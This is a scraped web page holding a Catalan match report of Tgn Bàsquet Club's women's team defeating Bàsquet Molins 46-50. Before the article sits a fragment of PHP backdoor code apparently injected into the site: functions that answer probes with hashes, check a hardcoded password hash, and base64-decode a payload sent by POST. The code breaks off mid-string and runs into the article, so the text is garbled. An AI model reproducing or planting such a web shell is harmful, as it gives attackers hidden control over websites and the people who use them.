function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Sènior femení A derrota el Bàsquet Molins en la primera jornada de la segona fase (46-50) - Tgn Bàsquet Club -

El Sènior femení A derrota el Bàsquet Molins en la primera jornada de la segona fase (46-50)

Updated: març 4, 2018

El Sènior femení A ha començat amb bon peu la segona fase de la lliga a Copa Catalunya femenina. El conjunt lila ha guanyat el Bàsquet Molins en un partit que semblava absolutament controlat per les tarragonines però que s’ha complicat molt en l’últim període. Amb tot, el TGN Bàsquet ha mantingut el cap fred i ha sumat un important triomf que el situa segon amb un balanç de 7 victòries i 2 derrotes (tot i que la segona fase començava avui, s’arrosseguen alguns resultats de la primera fase), una posició molt important perquè els tres primers classificats mantindran la categoria de forma automàtica.

El partit ha tingut un domini clar del TGN Bàsquet a l’inici. Molt sòlid en defensa i movent molt bé la pilota en atac, el conjunt lila ha obert una escletxa en el resultat gràcies a la clarividència ofensiva de Laura Pascual (4-9). Amb tot, aleshores hi ha hagut una davallada en el joc visitant que ha vist com el Bàsquet Molins feia un parcial de 9-2 i capgirava el resultat (13-11). Amb tot, un triple de Laura Pascual ha redreçat la situació i el primer període s’ha tancat amb un 13-15 favorable al TGN Bàsquet.

En el segon període el Bàsquet Molins ha volgut sorprendre i ha situat una defensa en zona. Aquest fet l’ha aprofitat la canonera del TGN Bàsquet, Núria Vilamajor, per anotar dos triples i ampliar les diferències (19-27). Contra la zona, el conjunt lila ha jugat còmode, trobant els tirs oberts i també a April Watson al pal baix. A més, el control del rebot —gran partit de Vadillo i Fort també— han permès les visitants arribar al descans amb un marcador favorable de 20-31.

El tercer quart ha seguit una mica la dinàmica del segon. La solidesa defensiva del TGN Bàsquet ha provocat que les locals tinguessin molts problemes per anotar i, tot i que les tarragonines tampoc han fet una actuació superba en atac, el domini era clar (30-44 al final del 3Q).

El quart període ha estat sorprenent. Així, el TGN Bàsquet ha gaudit del seu màxim avantatge en el partit (32-48) quan faltaven 8 minuts pel final però aleshores han començat els problemes. Un parell de males defenses en el bloqueig i continuació han permès una tiradora del Molins trobar-se sola a la cantonada i anotar dos triples seguits. A continuació, un mal atac lila i una altra cistella local. Resultat, parcial de 8-0 i nervis en les files visitants (40-48).

El Bàsquet Molins ha fet una defensa molt tancada sobre April Watson i això ha col·lapsat el joc ofensiu lila. D’aquí al final, el TGN Bàsquet només ha anotat dos tirs lliures (Ona Fort, i amb el marcador 42-48). El Molins no s’ha rendit en cap moment i ha anotat un triple a 23 segons pel final que deixava el resultat en 46-50.

Han estat moments de dubtes i imprecisions, amb errades ofensives pels dos equips i un triple final del Molins que no ha entrat.